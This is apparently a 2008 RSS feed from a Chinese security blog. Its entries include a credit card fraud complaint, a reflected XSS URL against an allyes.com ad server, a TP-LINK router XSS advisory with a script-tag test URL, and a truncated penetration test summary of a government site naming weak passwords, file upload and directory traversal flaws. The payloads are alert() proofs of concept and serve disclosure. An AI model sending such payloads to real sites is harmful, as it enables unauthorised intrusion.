<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[每天……]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[]]></description>
<link>http://hi.baidu.com/nansec</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[信用卡欺诈]]></title>
        <link><![CDATA[http://hi.baidu.com/nansec/blog/item/49bfdf95484f184dd1135efb.html]]></link>
        <description><![CDATA[
		
		<p>刚办的卡，还没有开卡就有人打电话说被透支1万了，囧。</p>
<p> </p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/nansec/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/nansec/blog/item/49bfdf95484f184dd1135efb.html#comment">查看评论</a>]]></description>
        <pubDate>2008-09-25  13:01</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[st4n]]></author>
		<guid>http://hi.baidu.com/nansec/blog/item/49bfdf95484f184dd1135efb.html</guid>
</item>

<item>
        <title><![CDATA[allyes.com跨站漏洞]]></title>
        <link><![CDATA[http://hi.baidu.com/nansec/blog/item/9a5d75d9f022d02a10df9be0.html]]></link>
        <description><![CDATA[
		
		<p>愚乐一下</p>
<p> </p>
<p> </p>
<p> </p>
<p>http://44.adsina.allyes.com/main/adfshow?user=AFP6_for_SINA|Home|HomePV&amp;db=sina&amp;local=yes&amp;border=0--&gt;'&quot;);&gt;&lt;/SCRIPT&gt;&lt;/style&gt;&lt;/title&gt;&lt;SCRIPT&gt;alert('http://hi.baidu.com/nansec');&lt;/SCRIPT&gt;</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/nansec/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/nansec/blog/item/9a5d75d9f022d02a10df9be0.html#comment">查看评论</a>]]></description>
        <pubDate>2008-09-04  10:30</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[st4n]]></author>
		<guid>http://hi.baidu.com/nansec/blog/item/9a5d75d9f022d02a10df9be0.html</guid>
</item>

<item>
        <title><![CDATA[TP-LINK路由跨站点脚本漏洞]]></title>
        <link><![CDATA[http://hi.baidu.com/nansec/blog/item/5c337b8143e352debd3e1e18.html]]></link>
        <description><![CDATA[
		
		<p>TP-LINK路由器跨站脚本漏洞</p>
<p>漏洞发现：</p>
<p>杭州安恒安全小组</p>
<p><br>
测试版本：</p>
<p>TL-R402系列</p>
<p><br>
描述：</p>
<p>TP-LINK是深圳市普联技术有限公司推出的路由器产品。<br>
TP-LINK在处理用户请求时存在验证缺陷，远程攻击者可能利用此漏洞在用户浏览器中执行恶意代码。</p>
<p>厂商：</p>
<p><a href="http://www.tp-link.com.cn/">www.tp-link.com.cn</a></p>
<p><br>
测试方法：</p>
<p><a href="http://routerip/&lt;script&gt;alert( dbappsecurity );&lt;/script">http://ip/&lt;script</a></p> <a href="http://hi.baidu.com/nansec/blog/item/5c337b8143e352debd3e1e18.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/nansec/blog/category/Advisory">Advisory</a>&nbsp;<a href="http://hi.baidu.com/nansec/blog/item/5c337b8143e352debd3e1e18.html#comment">查看评论</a>]]></description>
        <pubDate>2008-08-12  14:12</pubDate>
        <category><![CDATA[Advisory]]></category>
        <author><![CDATA[st4n]]></author>
		<guid>http://hi.baidu.com/nansec/blog/item/5c337b8143e352debd3e1e18.html</guid>
</item>

<item>
        <title><![CDATA[奥运金保障之XX文化厅评估一二]]></title>
        <link><![CDATA[http://hi.baidu.com/nansec/blog/item/8ac0460f5d67fa2c6159f355.html]]></link>
        <description><![CDATA[
		
		<p>第一次评估，</p>
<p>发现后台弱口令、上传任意文件到任意目录。</p>
<p>站内搜索的目录遍历漏洞。</p>
<p>之后他们自己加固了一次，修复了上面的漏洞。</p>
<p>第二次评估，</p>
<p>鉴于他们已经做过加固，所以上面的一些漏洞已经修复。</p>
<p>查询了一下他们的子站。</p>
<p>有个XXXXX的子域名，一看就知道是用于测试的。</p>
<p>不过没有连接数据库所以测试网站的后台是没法登录的。</p>
<p>意外的收获是管理员自己写了一个目录浏览的页面-=</p>
<p>查看xxxx子域名的目录结构，和主站的基本上一致。</p>
<p>尝试访问了一下之</p> <a href="http://hi.baidu.com/nansec/blog/item/8ac0460f5d67fa2c6159f355.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/nansec/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/nansec/blog/item/8ac0460f5d67fa2c6159f355.html#comment">查看评论</a>]]></description>
        <pubDate>2008-08-01  12:10</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[st4n]]></author>
		<guid>http://hi.baidu.com/nansec/blog/item/8ac0460f5d67fa2c6159f355.html</guid>
</item>

<item>
        <title><![CDATA[自省]]></title>
        <link><![CDATA[http://hi.baidu.com/nansec/blog/item/5a0c7238aae1b72597ddd8ad.html]]></link>
        <description><![CDATA[
		
		<p>在同一个地方失败两次,应该反省一下了.</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/nansec/blog/category/%D7%D4%D1%D4%D7%D4%D3%EF">自言自语</a>&nbsp;<a href="http://hi.baidu.com/nansec/blog/item/5a0c7238aae1b72597ddd8ad.html#comment">查看评论</a>]]></description>
        <pubDate>2008-07-29  19:35</pubDate>
        <category><![CDATA[自言自语]]></category>
        <author><![CDATA[st4n]]></author>
		<guid>http://hi.baidu.com/nansec/blog/item/5a0c7238aae1b72597ddd8ad.html</guid>
</item>


</channel>
</rss>